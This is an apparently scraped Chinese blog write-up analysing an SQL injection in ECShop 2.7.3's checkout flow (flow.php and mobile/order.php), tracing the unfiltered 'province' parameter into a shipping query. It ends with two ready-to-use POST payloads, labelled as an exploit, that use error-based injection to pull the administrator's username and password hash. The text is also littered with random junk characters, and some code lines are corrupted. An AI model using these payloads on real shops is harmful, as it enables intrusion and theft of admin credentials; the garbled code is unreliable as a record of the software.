ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

6 F' X4 J6 e. E    漏洞关键文件：
% s+ Y  t6 }( A! P3 r# @
    /includes/lib_order.php
/ y' ]! ^+ g2 m( S6 F+ [; }
    关键函数：

3 b, p6 @4 Z8 K4 ~+ u% J
+ C- [* j4 y& D7 H
6 T, [! u+ c; W) n6 l01     function available_shipping_list($region_id_list)
1 B' j8 `0 H1 {; @( @7 E
+ F3 }; m$ {+ ]& x; z; g9 g02 {
8 r* [( W; b- K8 X9 o. }, w8 i) f
03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
4 T" O' N1 S1 i6 }# Q: m  ]
04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

" I) B6 V" j7 W9 b1 K! X05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
8 I2 Q% H* H1 ]) m9 i
06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
) W: I+ W( [4 N  i
: J4 o/ m2 Z6 q3 G07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
, @. r3 j8 p. i4 S
9 C4 i- j" c( q1 l8 I08             'WHERE r.region_id ' . db_create_in($region_id_list) .

09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
6 a' |! T& Q- c* L3 j
: ?+ Y' O$ j3 }& N- B6 S10   
5 D6 X# }6 `% x2 l, J
; {8 A, }7 y6 i7 a% V7 n1 ]- x11     return $GLOBALS['db']->getAll($sql);

12 }

显然对传入的参数没有任何过滤就带入了查询语句。

下面我们追踪这个函数在flow.php中：
- }1 w1 g$ v6 q, V  J0 `! b1 U 第531行：   

1 $shipping_list     = available_shipping_list($region);


) M5 _6 ^2 K8 W$ P) D


再对传入变量进行追踪：
& ?, @5 I9 p# B: V8 g  m
第530行：   

1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);

, n/ C& ?/ r7 Y8 y+ @# h
! ~$ }# H1 C# ^; a. B


$ C+ [1 s9 Q4 {8 }# b第473行：        

+ B: m1 p4 E& J; m4 Q( m1 $consignee = get_consignee($_SESSION['user_id']);
2 n& v5 Z5 P! Q) l+ l
# _2 [- w& M+ N' E到了一个关键函数：
5 M7 u: w# O) L; J! Z
' `  `* \2 M& N5 e8 O: s/includes/lib_order.php


, }2 l+ |# w- N5 z9 A$ w! t
& C, u) `8 d4 {7 K4 m  v, D" a

01 function get_consignee($user_id)
/ L# F; A/ l) Y6 e5 v5 |2 M
+ R  T; D& v+ j/ d4 \- m$ T02 {

03     if (isset($_SESSION['flow_consignee']))
% ^. q' d; P& d$ T2 f
* S. D9 B% l/ m2 F4 v04     {

05         /* 如果存在session，则直接返回session中的收货人信息 */

06   

4 U! `& J7 S9 m8 K3 k) I: y07         return $_SESSION['flow_consignee'];
! h5 T, o) z7 S1 D
08     }
! u3 ~* p2 M3 R$ A: N
( G* i$ q* V3 i) |7 ?% S09     else
1 C; h4 D) o7 q
10     {
6 X. P- _+ d9 U0 n, j& g
4 `5 M+ U9 r! `1 [. `11         /* 如果不存在，则取得用户的默认收货人信息 */
2 p# N: t# `; r$ g
& }- Q/ q& h% z  Z0 o) @1 Y12         $arr = array();

13   
) ^' \' i6 f- |& L5 p
14         if ($user_id > 0)

15         {
) E' y- q+ k9 {* R4 ?7 N2 t' s4 N
16             /* 取默认地址 */

. `2 g6 f& O6 |$ |, I8 }17             $sql = "SELECT ua.*".

, f7 s8 t6 n: {# }18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.

& p% z( |7 k4 j" L$ F& n) R3 a3 T6 T19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";

9 G5 y& D+ x1 O# f20   

1 v+ j2 ?8 I& S3 C) k1 j$ x7 m! G21             $arr = $GLOBALS['db']->getRow($sql);

22         }

' {& }# j+ ?- O3 o% R3 l23   

2 o" t# V6 z; q! \24         return $arr;
: t& U2 M; c4 E* S
25     }
8 k# L0 X6 K. _* R6 L
26 }
' _! a* |) C4 E! j+ k* |9 q
  a0 C+ n5 e1 y4 l0 H& z4 [显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？


" Q" L* b  Z- o0 a$ m
关键点:
$ T  p( [8 z: g0 Q7 F, F) b
第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

4 y7 R2 r) v, y这里对传入参数反转义存入$_SESSION中。
$ v2 }- m. {3 _, y- Z


然后看下：
) [; K3 i! ^8 m2 q1 m/ i
" q" K. o3 }5 `' |8 y
3 A  p: ^  l  q: V4 R
) \+ J1 M/ ~/ I  R! P/ ]5 L   
2 M1 F! `" B- p% \) g0 g
01 $consignee = array(

/ U& D* c+ R( d- Z02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
$ Z4 _4 @6 i& P
4 }! T: p+ S8 S3 j03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
. F& D1 c/ k: J" r; |! S
4 }5 @  o4 t7 R/ G04         'country'       => empty($_POST['country'])    ? '' _POST['country'],

05         'province'      => empty($_POST['province'])   ? '' _POST['province'],
2 G( d$ Z( Z: f2 i  M
06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
- v9 ~# o, x0 V$ \1 v: A: ?
07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
! s: @7 v* J( U8 j6 o
08         'email'         => empty($_POST['email'])      ? '' _POST['email'],
/ {% f! }' X+ c7 ?
09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
( T$ A+ e( n& B0 \. K0 B
8 m" N2 s+ D- \10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
- x, \8 N  J6 `; \% E& B* S% R
# P8 g4 M: n5 ~: U4 z: _: B15     );

好了注入就这样出现了。

==================

6 E# N2 x. q' N1 a( I) k; h注入测试：

0 T( n& p4 s# L环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

测试程序：ECShop_V2.7.3_UTF8_release1106


: Y; `5 R- m+ h* |2 a3 d/ l+ c6 Y
1.首先需要点击一个商品加入购物车
2 {; M; k7 G) _4 f% g/ G
: X; M9 [) d! i+ x2 C  U; ?8 ^2.注册一个会员帐号
) B6 |/ p5 W; y' V* H  @
3.post提交数据
" n' ^  u1 x4 s: X9 {

& Y2 V7 y3 \3 \+ f
1 http://127.0.0.1/ecshop/flow.php

, |. t8 A- ^. G$ w3 u9 k  H% |2   

3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：
+ _* F7 A0 X9 q# ]7 ^
我们搜寻关键函数function available_shipping_list()
( Q9 ]" C- @: x# ~* F
在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

利用exp:

1.点击一个商品，点击购买商标

* \) |& h1 @3 I' \) F2.登录会员帐号

3.post提交：

" F0 @( \3 v6 [8 N. I' ^1 Fhttp://127.0.0.1/ecshop/mobile/order.php


) g3 h0 K/ U! {* m
  }) }* R: J, }, H+ @country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

# n: O9 r* H) P7 D/ o( c